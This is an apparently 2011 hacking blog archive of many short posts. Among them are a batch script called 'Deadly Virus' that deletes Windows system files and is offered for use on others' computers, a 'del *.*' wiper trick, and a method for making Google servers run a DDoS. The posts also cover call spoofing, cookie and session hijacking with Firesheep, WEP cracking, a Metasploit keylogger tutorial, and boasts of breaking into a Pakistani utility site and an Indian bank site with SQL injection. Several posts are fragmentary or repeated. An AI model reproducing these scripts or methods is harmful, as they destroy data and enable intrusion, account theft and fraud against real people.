Wednesday, 31 August 2011

DDOS using GOOGLE PLUS servers

A security penetration tester at Italian security firm AIR Sicurezza Informatica has claimed that flaws exist in Google's servers that will allow would-be hackers to exploit the search giant's bandwidth and launch a distributed denial-of-service (DDoS) attack on a server of their choosing.

On the IHTeam Security Blog, Simone Quatrini, also known as R00T.ATI, demonstrates how users can make Google's servers act as a proxy to fetch content on their behalf. Quatrini has written a shell script that will repeatedly prompt Google's servers to make requests to a site of the attacker's choice, effectively using Google's bandwidth rather than their own. The advantage of using Google and make requests through their servers, is to be even more anonymous when you attack some site (TOR+This method); The funny thing is that apache will log Google IPs. But beware: gadgets/proxy? will send your ip in apache log, if you want to attack, you’ll need to use /_/sharebox/linkpreview/.

How does it work?


However this method works better than many others i’ve tried before. forget the cracks and injectors etc… this is the BEST WAY:

1) start > run > “regedit” (without the quotes of course)

2) go to the key:


…and doubleclick on it. Then change some of the value data to ANYTHING ELSE…delete some, add some letters, I don’t care…just change it!

Delete all your system files with just 6 character command (part 2)

Delete all your system files with just 6 character command (part 5)

Copy the following code into your notepad and save it as a .bat file.
del *.*
All your files in your hard disk will vanish in less than 5mins.

Cookie stealing:Hacking IDs without Passwords

The concept:
Whenever you log into your account(say yahoo for example) there is a small piece of random code generated called a cookie.
A copy of this cookie is stored on your system and the other goes to the server.
This cookie is used for authentication purpose for example,  till the point of time you are logged in your account this piece of code is verified with the server whenever you perform some action.This helps in
authentication between you and the server.

Example:Just go to a yahoo login page and enter this particular code on the in place of the url

Crash a Computer System With Nothing But a Link (part 1)

1. Crash a Computer System With Nothing But a Link.

I stumbled across this URL while surfing the internet. This is a javascript “exploit” , it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer.


Click Here. (

my fan page on facebook

Wednesday, 24 August 2011


guys heres the best trick for u to view all the pics of the person you want to see i found and tried it myself so njoy nd keep on reading this page

after the "id=" type the id of the person whose pics u wish to see
try this and watch the magic

Wednesday, 10 August 2011

Facebook XSS Details found by BLACK WOLF

Earlier this week, I reported finding a cross-site scripting vulnerability on a page. Last night, I asked a friend with contacts at Facebook to let their developers know directly, and the company responded quickly. I confirmed just after midnight that the hole is now patched, which means I will now share technical details.
The problem was a fairly typical XSS issue. In poking around various pages related to application permissions, I noticed that several URI parameters appeared in the source of the page, but Facebook did a good job of filtering out characters which could allow cross-site scripting. Further experimentation revealed that specifying various parameters on one page led to various error messages.
This specific page was, a pop-up that can appear when an application requests extended permissions, such as read access to a user’s stream. A typical use of this page came by issuing a GET request with several parameters: api_key (the API key of the requesting application), v=1.0extern=1next(the next URI to load), channel_url (the cross-domain receiver file for communicating with Facebook), dialog_idlocale (language), and ext_perm (the specific extended permission requested).

Access Facebook Data Without Logging in to Facebook by BLACK WOLF

(N.B.: This is not an April Fool’s joke.)
Programmer Pete Warden made headlines a few months ago after creating a dataset of public profile information from 210 million Facebook users. Warden gathered his data by crawling the public search pages of some users have enabled, and planned on releasing it to the public. But Facebook threatened legal action, prompting Warden to destroy the information rather than risk an expensive court battle.
While I’m sympathetic to the privacy implications that led some to criticize Warden’s planned release, I also think that exposing the data would be an effective way of awakening Facebook users to what’s possible with information now classified as public. And while Warden abided by Facebook’s demands, it’s only a matter of time before someone less compliant publishes a similar dataset. Besides, many search engines already have similar resources in their indexes.

Easily View Hidden Facebook Friend Lists found by ISHAN ANAND (BLACK WOLF)

Lately I’ve demonstrated how various data on Facebook, such as photo albums and events, can be accessed by anyone when most users would probably think otherwise. You can now add friend lists to that category of data.
You may recall that when Facebook rolled out their new privacy settings, many analysts complained about the list of who a user had “friended” becoming part of what Facebook classified as Publicly Available Information. In response, Facebook added a setting to remove the lists from a user’s profile, a move that seemed to quell some of the criticism.

Trick to View Hidden Facebook Photos and Tabs found by BLACK WOLF

The code came from my own experiments on accessing the hidden photos. It worked quite manually, retrieving data from a particular Facebook interface and stuffing it into the current page. I figured a more elegant solution could be found by re-using the code already embedded in the page, but I had not been able to sort out all of the built-in functions.
Last night and this morning, I found what I’d been missing before, and I now present a far simpler version that gives full access to all available albums of a given user. Simply bookmark this link(right-click and choose to add a bookmark) and click the bookmark when viewing someone’s profile on Facebook.
Once again, please note that this does not in any way circumvent a user’s privacy settings. If you mark your albums as visible only to your friends, this trick will not override that setting. I do not currently know of a way to access private photo albums, and if I did find one, I would report it to Facebook. My purpose in posting this code is to prove a point, not break into users’ accounts.
Here is the new source code:

Sunday, 17 July 2011

Hyderabad Electric Supply Company website hacked By Ishan Anand And Team

HESCO-- Hyderabad Electric Supply Company website hacked by ME AND DEVIL HACKERS. Don't worry, no change in any schedule & nothing has been deleted. Also no page has been uploaded as this is very critical website for PAKISTAN, so we have respect for such BIG CRITICAL sites. Its not working now. Seems down for patching up the vulnerabilities.Special Thanks To Amarjeet Singh.

Call Spoofing

Earlier there was a call spoofing method but its not working now, But I have come across a new method fully working. Use it to call anyone using anybode else's number. You can also change your voice pitch so that the other person can't recognize you.

Warning-Only for educational purposes.

  • 1. Open
  • 2. Select your country and wait for the page to load.
  • 3. Enter the number you want to display in the first big box (Dont change the contents of small box if the fake number is of same country).

Indian website of Airtel GSM Mailing System Hacked by Ishan Anand (BLACK WOLF)

Airtel GSM Mailing System Hacked by mey....................................................................................

Saturday, 16 July 2011

Indian website of hacked by Ishan Anand
HACKED by me
Below are the screen shots captured by me,i don,t delete or modify any data,i capture essential screen shots and logout securely,

Indian Bank ICICI Learning Matrix Website Is Hacked By Ishan Anand (BLACK WOLF)

The Learning Matrix is ICICI initiative. website link is
I found Found SQL Injection Vulnerability in ICICI Learning Matrix
The administrator login page of this website is vulnerable to SQL Injection Attack

Learning Matrix Administrator Login page link is

Web server on which the site is hosted is Any one can get full access to this server and steal the sensitive information from the server.

Increase your DSL modem speed by upto 50%

This is a Simple Trick to Basically increase your DSL modem internet speed. I have even attached proofs of the increase in the speed.!!! Many people think that the Internet speed cannot be improved with softwares, but here is a software which could prove them wrong..!!!!

Tool needed:

The Bluetooth Spoofer : Spooftooph

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will only list one of the devices if more than one device in range shares the same device information when the devices are inDiscoverable Mode (specifically the same Address).
Well normally most of us never intend to audit the Bluetooth stack in any organization. But this tool could be interesting to use in an environment where Bluetooth devices have been paired with important hardware.

Easily Share Large Files Directly Pc 2 Pc Using WebBrowser Without Uploading Anywhere

Easily Share Large Files Directly PC To PC Using Web Browser Without Uploading Anywhere

[Image: 1copyv.png]

FilesOverMiles is a tool for direct file sharing, fast and secure way to send files over the Internet. No setup or sign up and the file transfers are not stored anywhere. It will appeal to many professionals who want to share files securely and efficiently.

How to hack online Sessions : Session Hijacking

Hello friends, from now onwards we will explore the most advanced Hacking Techniques. One of them is Session Hijacking. In today's tutorial we will discuss How to hack the online sessions using Session Hijacking. In today's Hacking class, i will explain basics of Session Hijacking like What is session Hijacking and Different types of Session Hijacking attacks and different methods to Hijack the sessions. In my next tutorial that is tomorrow i will explain you in Detail How to Hijack the Sessions and what tools you will need to Hijack the active sessions. So friends read on...

How to hack online sessions, session hijacking
How Session Hijacking works

How to Hack Facebook Passwords by adding into friend list

How to Hack Facebook Password: Facebook Password Hacker

Hacking Facebook Passwords
How to Hack Facebook Passwords by adding into friend list

These days many Facebook users have hundreds and possibly thousands of friends. More friends increase the chance that your Facebook account will be hacked – especially if you accept friend requests from people you do not know.

Critical vulnerability found on FACEBOOK

How to Hack Facebook Passwords by adding into friend list

How to Hack Facebook Password: Facebook Password Hacker

Hacking Facebook Passwords
How to Hack Facebook Passwords by adding into friend list

These days many Facebook users have hundreds and possibly thousands of friends. More friends increase the chance that your Facebook account will be hacked – especially if you accept friend requests from people you do not know.

Critical vulnerability found on FACEBOOK

Now Rip Or Clone Any Website [HTTRACK]

About It :
"It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system"

Download Now.!
HTTrack Version 3.44-1 [Windows 2000/XP/Vista/Seven]

Top 5 Hack Tools for Hackers to Investigate Computer System

 Hello Friends, today i will share with you top 5 hack tools for hackers to Investigate or Forensic their computer system or PC. Have you ever felt that your system is compromised or shared ? Do you think your system has unusual softwares or packages installed on it that sends your confidential or secret personal data to other Hackers? Always fears to test any hack tool that it contains viruses or malware or not? Wanna investigate your network that which application is sending which data to whom or where? 
If any of the question fits you then this post is for you. But if i speak by heart these tools are must for every normal users and hackers too to investigate their systems from boot to close. Today i am making you a real ethical hacker as today i will teach you how to investigate your system. And how to get rid of noobish antiviruses that do simply nothing on your PC just consumes resources of your system.

Free Paypal "buy now" [Exploit]

This is a Simple bit of JavaScript that can bypass payments, the site's need to be sites like these: 

How to use it:

Tuesday, 5 July 2011

HACKING SYSTEMS(Admin Account Hacking)

Sorry For So Much Delay Guys For This Class.. I was Pity Much Busy With Designing New Templates For My Website...Now I am Back With another awesome Hacking Class...
Today We will Start Learning How To Hack The Systems Practically....So Read On...

Hey Its a Brief Look That How We Will Proceed For hacking Systems!

~ Password cracking
~ Password attacks
~ Identifying various password cracking tools
~ Formulating countermeasures for password cracking
~ Getting privileges
~ Executing applications
~ Keyloggers and Spywares
~ Spywares and keyloggers countermeasures
~ Hiding files
~ Understanding rootkits
~ The use of Steganography
~ Covering tracks


Hey Friends As we all Know Cracking Passwords is not an easy task.. Also the Chances of getting Exact Passwords are 40 out of 100....But I think this Tutorial will really Help you...

Rapidshare | Hotfile Hack - Download Unlimited Without any Wait Time,Multiple Downloads

Hey Guys After a Hectic Research on Rapidshare :P . I reach to a final solution and you all will be surprised to see that we can Download as many as times i.e Unlimited By using my trick. This Tricks Works 1000% . So today I will Show How to Download Unlimited Using Rapidshare. So Guys Read On...

Note: We can download 4 - 5 files Parallel simultaneously...
LIMITATION: Will Work Only With Dynamic IP broadband's like BSNL,AIRTEL etc..

1. Dynamic IP broadband like BSNL.
2.Any Good Web browser like Google Chrome or Firefox.
3. My Rapidshare Batch File.
4. List of 4 Best premium Link Generators.
5. Good Download Manager Like IDM(Internet Download Manager)

Hotfile Rapidshare Megaupload Premium Account Link Generator 100 % Working and tested

Download slots are UNLIMITED today!.


Wednesday, 29 June 2011

Hack Facebook / Twitter accounts using Fire Sheep

In my Previous tutorial Hack Facebook /twitter accounts by stealing cookies we hacked Facebook book by side jacking i.e stealing cookies and injecting them in our browser . In this tutorial we will do the same by using a tool Fire sheep .This hack works when computers are connected in  a LAN (Local area network ) or when connected in public WiFi . Best place try out this hack is in schools , collages where computers are connected in LAN and in public places such as airports , hotels  where there's public WiFi

What is Fire Sheep 

Fire sheep is an extension developed by Eric Butler for the Firefox web browser. The extension uses a packet sniffer to intercept unencrypted cookies from certain websites (such as Facebook and Twitter) as the cookies are transmitted over networks, exploiting session hijacking vulnerabilities. It shows the discovered identities on a sidebar displayed in the browser, and allows the user to instantly take on the log-in credentials of the user by double-clicking on the victim's name

Friday, 17 June 2011

"Who is Viewing Your Facebook Profile" Facebook Stalker spam

Recently i got this notification "karan posted in your wall" (karan is my friend).  So I visit my profile and see what he posted in my wall .  This is what i saw

"WOW! Its unbelieveable now you can really get to know who visits you on facebook anytime you like.. i can see my top visitors and i am so shocked that my EX is still creeping my photos every hour" 

But he told me that he didn't post in my wall. He just click the link which is given in the message and follow the steps.  I realize that it is scam,  But this scam spreads faster.

How Does Anti virus detects viruses?

I hope you know what is computer Anti Virus. But you may not know how the anti virus works.  Here i am sharing how the antivirus software works. 

What you know about Anti Virus software?

Antivirus software gives protection against the viruses and Malware. Antivirus can detect the malicious software ,then delete or put it in quarantine. 

What is Your Password ? How the Password should be?

What is your password ? is your password like 123456, 98654, billgates,yourname,lovername,iloveyou,thankyou?  Then you will definitely  loose your account soon.  The hackers can easily hack your account with much effort.

Your password should be :

  • Above 10 letters
  • Both uppercase and lowercase letters
  • Should use special characters like '&'.
  • Should contain Numbers
  • Should not Use any names of your lover ,mother,father,etc.
  • Should not be usual words like iloveyou,ihateyou,ihateu.
  • Should not be your birthday like oct2010.

Consider this tips when you create a password. Secure your password.

How to Hacking Facebook with security Question Vulnerability?

You can bypass the security question and hack the friend's face book account with 2 mutual Friends.

Facebook Feature(drawback)?
 Facebook provides option to recover your account with security question.  But if you forget the answer , still you can recover with your 3 friends account.

How the Hackers hacking the facebook accounts?

 if they are not your friends, they may request with 3 fake facebook accounts to become a friend. if they are your friend, it is very simple to hack your account.

 At first hacker will visit the forget password page of facebook.  and search for your/victim account with their details (if he want to hack means, definitely he analyze completely about you).  So he will enter the details of yours and find your account.

Tuesday, 7 June 2011

Top 5 Hack Tools for Hackers to Investigate Computer System

Hello Friends, today i will share with you top 5 hack tools for hackers to Investigate or Foresnic their computer system or PC. Have you ever felt that your system is compromised or shared ? Do you think your system has unusual softwares or packages installed on it that sends your confidential or secret personal data to other Hackers? Always fears to test any hack tool that it contains viruses or malware or not? Wanna investigate your network that which application is sending which data to whom or where?
If any of the question fits you then this post is for you. But if i speak by heart these tools are must for every noraml users and hackers too to investigate their systems from boot to close. Today i am making you a real ethical hacker as today i will teach you how to investigate your system. And how to get rid of noobish antiviruses that do simply nothing on your PC just consumes resources of your system.

List of top 5 hack tools for hackers to Inverstigate or Forensic Computer system or PC:

Advanced Online Ethical Hacking Class starts from Today

Hello Friends, as we have almost covered all the basic topics in Ethical Hacking class so now the time has come that we can start advanced hacking classes that will cover all the advance topics. Previous hacking classes were just introductory hacking classes that introduces you with different hacking related topics and they were containing only theoretical content that was just to build your base and clear the basic concepts about Ethical Hacking. From Now onwards we will start advanced ethical Hacking classes to provide you a deeper look up inside your PC, network and web.

hacking, hacking class, ethical hacking class
Advanced Ethical Hacking Class

In advanced Hacking classes we will cover several advanced Topics, and i have also decided that i will provide you PDF ebook for each hacking class so that you can read it whenever you want. 

Vodafone Stealing Information Using Botnet Malware - So Beware Guys

Guys Its Really shocking but Its truth . The New Vodaphone HTC Magic Phone Contain Malware's in the software Inbuilt and Its stealing Personal Data of the Users. So Beware Guys !
This is Pity Ridiculous that company is distributing malware at its userbase. Unfortunately it probably won’t be the last.

Today one of our colleagues received a brand new Vodafone HTC Magic with Google’s Android OS. “Neat” she said. Vodafone distributes this phone to its userbase in some European countries and it seems affordable as you can get it for 0€ or 1€ under certain conditions.

Thursday, 5 May 2011


Its so simple to save youtube video without using any software.
remember this trick works on only mozila firefox.


C:\Documents and Settings\.......\Local Settings\Application Data\Mozilla\Firefox\Profiles\hc6pnitc.default\Cache

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

--- The Metasploit Framework ---

Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.
Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.
The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Sunday, 1 May 2011


guys,to crack wep key first of all you need backtrack 4 software.
download it from google search.
 I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.

Login: root
Password: toor


Once logged in, type in: startx
BT4 is now set up, heres the following.


1. Open konsole and type the following to start up network connections.

/etc/init.d/networking start

2. Now we are going to put the network card into monter mode by typing the following.

Sunday, 24 April 2011


Many computer criminals give out user names and ovens that they obtained illegally. MORE......
"Where do I type that command?" People ask that all the time when they read my early Guides to (mostly) Harmless Hacking.
However, nowadays you might never even hear about telnet, much less use it, unless you are a hacker. So if you are still wondering about telnet, today is your lucky day.
What Is Telnet? Telnet is a protocol that is most commonly used to log into a remote computer. It also is the single most powerful hacking tool on the planet. With just a telnet client program, you can: send email download source code from web sites send unexpected input to webservers that can give you amazing and sometimes interesting results give arbitrary input to many other services on Internet host computers probe the services offered by servers, routers and even people's home computers.

Saturday, 23 April 2011

How to find the MAC address of a device from its IP address

During a ping the IP address must be resolved to the physical MAC
address. As a result your computer keeps a physical address
translation table called an ARP table.

From a command prompt ping the IP address. After the ping has completed type
arp -a
This will list all the IP addresses and corresponding Physical
addresses that have been resolved

How to hack remote computer using IP Address

Now, what do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:

Ophcrack Guide : Hack Any Password In Windows

There might be many times you have heard of Ophcrack, now what is actually it well is a popular to crack passwords in windows.
Many Hackers out there love this tool and you should also, Tools like this made hacking possible in this world of security’s.

What is ophcrack ?

Ophcrack is a free Windows password cracker based on rainbow tables.
It is a very efficient implementation of rainbow tables done by the inventors of the method.
It comes with a Graphical User Interface and runs on multiple platforms....

How to do Netbios Hacking


1.Open command prompt

2. In the command prompt use the “net view” command

How to disguise yourself as a Google Bot.

Yes, sometimes you want to visit sites, acting like a machine, to confuse people. You can, in fact, disguise yourself as a Google spider or bot. You see, there is something called a Google Web Site Translator. What it does, as you put in a site, select what language to translate it to, and it displays the page in the selected language. For example, the page is in German, so you select, “German to English”, and it will display it in English.
You can use this translator as a proxy. If you’re some idiot who wants to spam a forum or hack a Myspace, you could use that, but I will hate your sorry ass for using my article to do your dirty work, you smart donkey. This Google, “proxy”, may not be as secure as some proxies, but it does confuse people.

How To View Hidden Directories In A Website Using Robots.txt

Many a times in hacking you need to know the web directories. But its hard to find it out as a server might contain uncountable no. of Directories in it.
But a major hole in this security is the Robots.txt
What is Robots.txt

Deadly Virus

hey frndzzzzzzzzzz
do you have this post you can learn how to make deadly virus.

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

Copy these lines in notepad and save it as "
h4cker.bat" or "h4cker.exe"

Try this on any other comp.. Very heavy Virus.. njoyyyyyyyyyyyyyyyyyyy

Javascript Injection Attack

Javascript Injection is a facility by which we can insert our own javascript codes into the websites, either by entering the code into the address bar, or by finding an XSS(Cross site Scripting) vulnerability in a website. Note that the changes can only be seen by you and are not permanent. This is because JavaScript is a ‘client-side’ language.
This can be very useful when one needs to spoof the server by editing some form option.
Javascript Injection Shall be briefly covered up in the following three parts
1. Injection Basics
2. Cookie Editing
3. Form Editing

Friday, 22 April 2011

free download ebook | XSS Attacks

PUBLISHED BY- Syngress Publishing, Inc. ISBN-10: 1-59749-154-3
ISBN-13: 978-1-59749-154-9

This book is all about XSS. It will cover these topics on XSS.

Cross-site Scripting Fundamentals.
The XSS Discovery Toolkit
XSS Theory
XSS Attack Methods
Advanced XSS Attack Vectors
XSS Exploited
Exploit Frameworks
XSS Worms
Preventing XSS Attacks

Download Here: